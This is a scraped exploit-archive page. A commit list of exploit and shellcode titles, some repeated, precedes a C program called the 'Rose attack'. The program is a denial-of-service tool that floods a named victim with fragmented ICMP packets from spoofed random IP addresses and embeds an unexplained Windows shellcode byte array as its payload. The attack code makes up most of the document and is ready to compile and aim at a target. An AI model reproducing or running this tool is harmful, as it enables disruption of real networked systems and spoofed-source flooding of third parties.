880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
243 lines
No EOL
7.1 KiB
C
243 lines
No EOL
7.1 KiB
C
// source: https://www.securityfocus.com/bid/11258/info
|
|
|
|
Multiple vendor implementations of the TCP stack are reported prone to a remote denial-of-service vulnerability.
|
|
|
|
The issue is reported to present itself due to inefficiencies present when handling fragmented TCP packets.
|
|
|
|
The discoverer of this issue has dubbed the attack style the "New Dawn attack"; it is a variation of a previously reported attack that was named the "Rose Attack".
|
|
|
|
A remote attacker may exploit this vulnerability to deny service to an affected computer.
|
|
|
|
Microsoft Windows 2000/XP, Linux kernel 2.4 tree, and undisclosed Cisco systems are reported prone to this vulnerability; other products may also be affected.
|
|
|
|
/***
|
|
ROSE attack (chuck (at) lemure.net)
|
|
|
|
Discovered by:
|
|
gandalf@digital.net
|
|
|
|
code modified from large IGMP attack by:
|
|
Kox by Coolio (coolio@k-r4d.com)
|
|
|
|
|
|
Sends out first and last ICMP packet echo request.
|
|
Reportedly works for TCP / UDP as well, since this is
|
|
a IP layer attack.
|
|
|
|
Eats up all available packets for fragmentation reassembly.
|
|
|
|
|
|
***/
|
|
|
|
/* just a thousand kills win XP */
|
|
|
|
#define NUM_PACKETS 1000
|
|
|
|
|
|
#include <stdio.h>
|
|
#include <unistd.h>
|
|
#include <stdlib.h>
|
|
#include <netdb.h>
|
|
#include <string.h>
|
|
#include <errno.h>
|
|
#include <pwd.h>
|
|
#include <time.h>
|
|
#include <sys/types.h>
|
|
#include <sys/socket.h>
|
|
#include <sys/utsname.h>
|
|
#include <netinet/in.h>
|
|
#include <netinet/ip.h>
|
|
#include <netinet/ip_icmp.h>
|
|
|
|
#include <netinet/ip_icmp.h>
|
|
|
|
/* Figured I try sending some shell code for my random payload...
|
|
doesn't do anything
|
|
*/
|
|
|
|
char code[] =
|
|
"\xe8\x38\x00\x00\x00\x43\x4d\x44\x00\xe7\x79\xc6\x79\xe5\x49\x86"
|
|
"\x49\xa4\xad\x2e\xe9\xa4\x1a\x70\xc7\xd9\x09\xf5\xad\xcb\xed\xfc"
|
|
"\x3b\x8e\x4e\x0e\xec\x7e\xd8\xe2\x73\xad\xd9\x05\xce\x72\xfe\xb3"
|
|
"\x16\x57\x53\x32\x5f\x33\x32\x2e\x44\x4c\x4c\x00\x01\x5b\x54\x89"
|
|
"\xe5\x89\x5d\x00\x6a\x30\x59\x64\x8b\x01\x8b\x40\x0c\x8b\x70\x1c"
|
|
"\xad\x8b\x58\x08\xeb\x0c\x8d\x57\x2c\x51\x52\xff\xd0\x89\xc3\x59"
|
|
"\xeb\x10\x6a\x08\x5e\x01\xee\x6a\x0a\x59\x8b\x7d\x00\x80\xf9\x06"
|
|
"\x74\xe4\x51\x53\xff\x34\x8f\xe8\x90\x00\x00\x00\x59\x89\x04\x8e"
|
|
"\xe2\xeb\x31\xff\x66\x81\xec\x90\x01\x54\x68\x01\x01\x00\x00\xff"
|
|
"\x55\x20\x57\x57\x57\x57\x47\x57\x47\x57\xff\x55\x1c\x89\xc3\x31"
|
|
"\xff\x57\x57\x68\x02\x00\x22\x11\x89\xe6\x6a\x10\x56\x53\xff\x55"
|
|
"\x18\x57\x53\xff\x55\x14\x57\x56\x53\xff\x55\x10\x89\xc2\x66\x81"
|
|
"\xec\x54\x00\x8d\x3c\x24\x31\xc0\x6a\x15\x59\xf3\xab\x89\xd7\xc6"
|
|
"\x44\x24\x10\x44\xfe\x44\x24\x3d\x89\x7c\x24\x48\x89\x7c\x24\x4c"
|
|
"\x89\x7c\x24\x50\x8d\x44\x24\x10\x54\x50\x51\x51\x51\x41\x51\x49"
|
|
"\x51\x51\xff\x75\x00\x51\xff\x55\x30\x89\xe1\x68\xff\xff\xff\xff"
|
|
"\xff\x31\xff\x55\x2c\x57\xff\x55\x0c\xff\x55\x28\x53\x55\x56\x57"
|
|
"\x8b\x6c\x24\x18\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18"
|
|
"\x8b\x5a\x20\x01\xeb\xe3\x32\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc"
|
|
"\x31\xc0\xac\x38\xe0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c"
|
|
"\x24\x14\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c"
|
|
"\x01\xeb\x8b\x04\x8b\x01\xe8\xeb\x02\x31\xc0\x89\xea\x5f\x5e\x5d"
|
|
"\x5b\xc2\x08\x00";
|
|
|
|
void usage(char *arg)
|
|
{
|
|
printf("Rose attack\n");
|
|
printf("Usage: %s <victim> [source]\n", arg);
|
|
printf("If source not specified, will send out from random ip's\n");
|
|
exit(1);
|
|
}
|
|
|
|
|
|
unsigned int randip()
|
|
{
|
|
struct hostent *he;
|
|
struct sockaddr_in sin;
|
|
char *buf = (char *)calloc(1, sizeof(char) * 16);
|
|
|
|
sprintf(buf, "%d.%d.%d.%d",
|
|
(random()%191)+23,
|
|
(random()%253)+1,
|
|
(random()%253)+1,
|
|
(random()%253)+1);
|
|
|
|
|
|
|
|
return inet_addr(buf);
|
|
|
|
}
|
|
|
|
unsigned short in_cksum(unsigned short *buh, int len)
|
|
{
|
|
register long sum = 0;
|
|
unsigned short oddbyte;
|
|
register unsigned short answer;
|
|
|
|
while(len > 1) {
|
|
sum += *buh++;
|
|
len -= 2;
|
|
}
|
|
|
|
if(len == 1) {
|
|
oddbyte = 0;
|
|
*((unsigned char *)&oddbyte) = *(unsigned char *)buh;
|
|
sum += oddbyte;
|
|
}
|
|
|
|
sum = (sum >> 16) + (sum & 0xFFFF);
|
|
sum += (sum >> 16);
|
|
answer = ~sum;
|
|
return answer;
|
|
}
|
|
|
|
int rose(struct sockaddr_in *victim, unsigned long src)
|
|
{
|
|
int SMALLICMP = 1000;
|
|
unsigned char *pkt;
|
|
struct iphdr *ip;
|
|
struct igmphdr *igmp;
|
|
struct icmphdr *icmp_pkt;
|
|
struct utsname *un;
|
|
struct passwd *p;
|
|
|
|
int i, s,j;
|
|
int id = (random() % 40000) + 500;
|
|
|
|
pkt = (unsigned char *)calloc(1, SMALLICMP);
|
|
ip = (struct iphdr *)pkt;
|
|
icmp_pkt = (struct icmphdr *)(pkt + sizeof(struct iphdr));
|
|
ip->version = 4;
|
|
ip->ihl = (sizeof *ip) / 4;
|
|
ip->ttl = 255;
|
|
ip->tot_len = htons(SMALLICMP);
|
|
ip->protocol = 1;
|
|
ip->id = htons(id);
|
|
ip->frag_off = htons(IP_MF);
|
|
ip->saddr = src;
|
|
ip->daddr = victim->sin_addr.s_addr;
|
|
ip->check = in_cksum((unsigned short *)ip, sizeof(struct iphdr));
|
|
|
|
icmp_pkt->type = ICMP_ECHO;
|
|
icmp_pkt->code = 0;
|
|
icmp_pkt->checksum = 1000;
|
|
icmp_pkt->un.echo.id = random() % 255;
|
|
icmp_pkt->un.echo.sequence = random() % 255;
|
|
|
|
for(i = sizeof(struct iphdr) + sizeof(struct icmphdr) + 1;
|
|
i < SMALLICMP; i++){
|
|
//pkt[i] = random() % 255;
|
|
pkt[i] = '\x00';
|
|
}
|
|
j=0;
|
|
for (i=sizeof(struct iphdr) + sizeof(struct icmphdr) + 500;
|
|
i < sizeof(struct iphdr) + sizeof(struct icmphdr) + 500 + 356;
|
|
i++){
|
|
pkt[i] = code[j];
|
|
j++;
|
|
}
|
|
if((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
|
|
perror("error: socket()");
|
|
return 1;
|
|
}
|
|
|
|
if(sendto(s, pkt, SMALLICMP, 0, (struct sockaddr *)victim,
|
|
sizeof(struct sockaddr_in)) == -1) {
|
|
perror("error: sendto()");
|
|
return 1;
|
|
}
|
|
|
|
/* big frag at end... */
|
|
|
|
ip->frag_off = htons(8100);
|
|
//ip->frag_off = htons(8100 | IP_MF);
|
|
sendto(s, pkt, SMALLICMP, 0, (struct sockaddr *)victim,
|
|
sizeof(struct sockaddr_in));
|
|
|
|
free(pkt);
|
|
close(s);
|
|
usleep(1000);
|
|
return 0;
|
|
}
|
|
|
|
int main(int argc, char *argv[])
|
|
{
|
|
struct sockaddr_in victim;
|
|
struct hostent *he;
|
|
unsigned long source;
|
|
int i;
|
|
|
|
srandom(time(NULL));
|
|
|
|
if(argc < 2)
|
|
usage(argv[0]);
|
|
|
|
if((he = gethostbyname(argv[1])) == NULL) {
|
|
herror(argv[1]);
|
|
exit(1);
|
|
}
|
|
|
|
if (argc > 2){
|
|
source = inet_addr(argv[2]);
|
|
}
|
|
else {
|
|
source = randip();
|
|
}
|
|
|
|
memcpy(&victim.sin_addr.s_addr, he->h_addr, he->h_length);
|
|
victim.sin_port = htons(0);
|
|
victim.sin_family = PF_INET;
|
|
|
|
printf("Sending ICMP fragments: ");
|
|
fflush(stdout);
|
|
for(i = 0; i < NUM_PACKETS; i++)
|
|
{
|
|
rose(&victim, source);
|
|
if (argc < 3){
|
|
source = randip();
|
|
}
|
|
printf("%d\n", i);
|
|
fflush(stdout);
|
|
}
|
|
printf("\nDONE\n");
|
|
fflush(stdout);
|
|
} |